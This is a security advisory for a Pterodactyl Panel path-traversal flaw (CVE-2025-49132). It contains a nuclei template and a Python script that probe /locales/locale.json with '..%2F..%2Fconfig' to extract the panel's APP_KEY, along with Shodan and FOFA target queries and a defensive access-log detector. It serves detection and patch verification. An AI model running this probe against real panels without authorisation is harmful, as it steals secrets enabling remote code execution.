CVE-2025-49132: Pterodactyl Panel - Remote Code Execution

Date: 2025-08-01 | Affected software: Pterodactyl Panel | PoC: public

Vulnerability description

Pterodactyl is a free, open-source game server management panel. Through the /locales/locale.json endpoint and its locale and namespace query parameters, an unauthenticated attacker can execute arbitrary code on the panel host. The public template below does not execute code itself: it confirms the underlying path traversal by pointing the locale loader at the panel's app configuration (locale=../../config, namespace=app) and extracting the application key from the JSON response, which is enough evidence that the endpoint will read arbitrary files. Fixed in Pterodactyl Panel 1.11.11.

PoC code [public] (nuclei template)

id: CVE-2025-49132

info:
  name: Pterodactyl Panel - Remote Code Execution
  severity: critical
  author: darses
  description: |
    Pterodactyl is a free, open-source game server management panel. Using the /locales/locale.json with the locale and namespace query parameters, a malicious actor is able to execute arbitrary code without being authenticated.
  impact: |
    With the ability to execute arbitrary code, this vulnerability can be exploited in an infinite number of ways. It could be used to gain access to the Panel's server, read credentials from the Panel's config (.env or otherwise), extract sensitive information from the database (such as user details [username, email, first and last name, hashed password, ip addresses, etc]), access files of servers managed by the panel, etc.
  remediation: |
    Upgrade to Pterodactyl version 1.11.11+. There are no software workarounds for this vulnerability, but use of an external Web Application Firewall (WAF) could help mitigate this attack.
  reference:
    - https://github.com/pterodactyl/panel/security/advisories/GHSA-24wv-6c99-f843
    - https://github.com/pterodactyl/panel/commit/24c82b0e335fb5d7a844226b08abf9f176e592f0
    - https://github.com/pterodactyl/panel/releases/tag/v1.11.11
  classification:
    epss-score: 0.30921
    epss-percentile: 0.96595
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-49132
    cwe-id: CWE-20
  metadata:
    verified: true
    vendor: pterodactyl
    product: panel
    shodan-query:
      - title:"Pterodactyl"
      - http.favicon.hash:-456405319
      - http.favicon.hash:846001371
      - "Set-Cookie: pterodactyl_session="
    fofa-query:
      - title="Pterodactyl"
      - icon_hash="-456405319"
      - icon_hash="846001371"
      - "Set-Cookie: pterodactyl_session="
  tags: pterodactyl, cve, cve2025, rce, lfi, vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '{"app":{"version":'
          - '"key":"base64{{'
        condition: and

    extractors:
      - type: json
        name: APP_KEY
        json:
          - ".[] | .app.key"
# digest: 4b0a00483046022100ee3eeec86b107c5613cf202eda052322fa8c134134977947c43fe1f5067f3c96022100e034e0f003f8f99c0458cf00fcfbece9907d9c1d46bc461bc377a2bff1dc4388:922c64590222798bb761d5b6d8e72950
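The following Python script is an added example, not code from the Pterodactyl project or from the nuclei template author. It reproduces what the template above does (the probe path, the status and word matchers, and the `.[] | .app.key` extractor) so the check can be run and reasoned about without nuclei, and adds an access-log detector for the same traversal pattern, which is the kind of check a defender wants while the advisory's only interim mitigation is an external WAF. The response body and log lines are constructed here; the assumption that the endpoint wraps the loaded file under the requested locale name (so the body looks like `{"<locale>": {"app": {...}}}`) is taken from the template's matchers and extractor, not from the panel's source.

```python
# Added example for CVE-2025-49132: a Python equivalent of the nuclei template
# plus an access-log detector. Not project code; sample data is constructed.
import json
import re
import sys
from typing import List, Optional, Tuple
from urllib.error import HTTPError
from urllib.parse import parse_qs, unquote, urlsplit
from urllib.request import Request, urlopen

# Probe path taken verbatim from the template.
PROBE_PATH = "/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app"
# Word matchers from the template (Laravel application keys are "base64:"-prefixed).
MARKERS = ('{"app":{"version":', '"key":"base64')


def matches(status: int, body: str) -> bool:
    """Template matcher: HTTP 200 AND both markers present in the body."""
    return status == 200 and all(m in body for m in MARKERS)


def extract_app_key(body: str) -> Optional[str]:
    """Template extractor `.[] | .app.key`: walk top-level values, return .app.key.

    Assumes (from the template) the body is {"<locale>": {"app": {...}}}.
    """
    try:
        data = json.loads(body)
    except ValueError:
        return None
    for value in (data.values() if isinstance(data, dict) else data):
        app = value.get("app") if isinstance(value, dict) else None
        if isinstance(app, dict) and isinstance(app.get("key"), str):
            return app["key"]
    return None


# Access-log detector (nginx/Apache combined format). Flags requests to the
# locale endpoint whose locale or namespace parameter contains a ".." path
# segment after URL decoding (decoded twice to catch ..%252F double encoding).
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def suspicious_request(line: str) -> bool:
    m = LOG_RE.search(line)
    if not m:
        return False
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/locales/locale.json"):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes %XX once
    for name in ("locale", "namespace"):
        for raw in params.get(name, []):
            if TRAVERSAL.search(unquote(unquote(raw))):
                return True
    return False


def scan_log(lines: List[str]) -> List[str]:
    return [line for line in lines if suspicious_request(line)]


def probe(base_url: str, timeout: float = 10.0) -> Tuple[int, str]:
    """Live check against a panel you are authorised to test; returns (status, body)."""
    req = Request(base_url.rstrip("/") + PROBE_PATH,
                  headers={"User-Agent": "cve-2025-49132-check"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


# Constructed sample response in the shape the template's extractor implies;
# the key value is a placeholder, not a real application key.
SAMPLE_BODY = json.dumps({
    "../../config": {
        "app": {"version": "1.11.10",
                "key": "base64:" + "A" * 43 + "=",
                "debug": False},
    }
}, separators=(",", ":"))

# Constructed access-log lines: one benign locale fetch, the template's probe,
# a double-encoded variant of it, and an unrelated request.
SAMPLE_LOG = [
    '203.0.113.10 - - [01/Aug/2025:10:00:01 +0000] "GET /locales/locale.json?locale=en&namespace=server HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [01/Aug/2025:10:00:02 +0000] "GET /locales/locale.json?locale=..%2F..%2Fconfig&namespace=app HTTP/1.1" 200 2331 "-" "curl/8.0"',
    '203.0.113.10 - - [01/Aug/2025:10:00:03 +0000] "GET /locales/locale.json?locale=..%252F..%252Fconfig&namespace=app HTTP/1.1" 200 2331 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Aug/2025:10:00:04 +0000] "GET /api/client HTTP/1.1" 401 88 "-" "curl/8.0"',
]

if __name__ == "__main__":
    if len(sys.argv) > 1:
        status, body = probe(sys.argv[1])
        print("matched" if matches(status, body) else "not matched", extract_app_key(body))
    else:
        print("sample matched:", matches(200, SAMPLE_BODY), "key:", extract_app_key(SAMPLE_BODY))
        for hit in scan_log(SAMPLE_LOG):
            print("suspicious:", hit)
```

Run it with a base URL as the only argument to perform the live probe against a panel you are authorised to test; with no arguments it exercises the matcher, extractor and log detector on the constructed samples. The log detector decodes parameters twice on purpose: a WAF rule that only looks for the literal `..%2F` in the raw query string misses the `..%252F` form, which the web server decodes before the application sees it.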
